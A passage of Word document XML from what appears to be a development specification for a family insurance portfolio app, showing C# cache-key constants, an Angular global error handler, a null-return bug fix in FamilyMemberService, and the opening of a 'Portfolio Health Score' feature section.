          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Agent = "Agent";</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public static class DocumentType</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public const string Policy  = "Policy";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Receipt = "Receipt";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public const string Claim   = "Claim";</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public static class CacheKeys</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public static string Forecast(int fy, int memberHash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            =&gt; $"forecast:{fy}:{memberHash}";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        public static string DashboardStats(int memberHash)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            =&gt; $"dashboard:stats:{memberHash}";</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w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec3-3" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3  Global Error Handler — Angular Frontend</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">New File: src/app/core/global-error-handler.ts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ErrorHandler, Injectable, NgZone } from "@angular/core";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import { Router } from "@angular/router";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">import { ToastService } from "../services/toast.service";</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@Injectable()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">export class GlobalErrorHandler implements ErrorHandler {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    constructor(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        private zone: NgZone,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        private toast: ToastService,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        private router: Router</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    ) {}</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handleError(error: any): void {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        const message = error?.message || "An unexpected error occurred.";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        const status  = error?.status;</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console.error("[GlobalErrorHandler]", error);</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this.zone.run(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (status === 401) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                this.router.navigate(["/login"]);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                return;</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if (status === 403) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                this.toast.error("You do not have permission to perform this action.");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                return;</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if (status === 0 || status === 503) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                this.toast.error("Server is unreachable. Please check your connection.");</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">                return;</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this.toast.error(message.length &gt; 120 ? message.substring(0, 120) + "..." : message);</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Register in app.config.ts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// { provide: ErrorHandler, useClass: GlobalErrorHandler }</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec3-4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4  Fix FamilyMemberService Null Return</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">File: Services/FamilyMemberService.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// BEFORE — null! suppresses the compiler warning but causes runtime crash:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public async Task&lt;FamilyMemberDto&gt; GetByIdAsync(int id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var member = await _context.FamilyMembers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .FirstOrDefaultAsync(m =&gt; m.Id == id);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    if (member == null) return null!;   // ← BUG: NullReferenceException in production</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AFTER — throw a typed exception that the ExceptionMiddleware can handle:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public async Task&lt;FamilyMemberDto&gt; GetByIdAsync(int id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">    var member = await _context.FamilyMembers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Include(m =&gt; m.Parent)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Include(m =&gt; m.Children)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .Include(m =&gt; m.Policies).ThenInclude(p =&gt; p.PolicyType)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        .FirstOrDefaultAsync(m =&gt; m.Id == id)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">        ?? throw new KeyNotFoundException($"Family member with ID {id} not found.");</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ExceptionMiddleware already handles KeyNotFoundException → 404 response</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:after="200" w:before="400"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec4" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1E1B4B"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Section 4 — New Feature Implementation</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Each new feature below is described with complete backend models, service interfaces, API endpoints, and Angular component specifications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="140" w:before="320"/>
      </w:pPr>
      <w:bookmarkStart w:name="sec4-1" w:id="1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4F46E5"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1  Portfolio Health Score</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Overview</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100" w:before="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A computed score (0–100) that evaluates the quality of the family's insurance portfolio across six dimensions. Displayed as an animated radial gauge on the Dashboard.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="100" w:before="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="475569"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1.1  New DTOs — HealthScoreResultDto.cs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">public class HealthScoreResultDto</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="E2E8F0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E293B" w:val="clear"/>
        <w:spacing w:after="20" w:before="20" w:line="276"/>
        <w:ind w:left="200" w:right="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
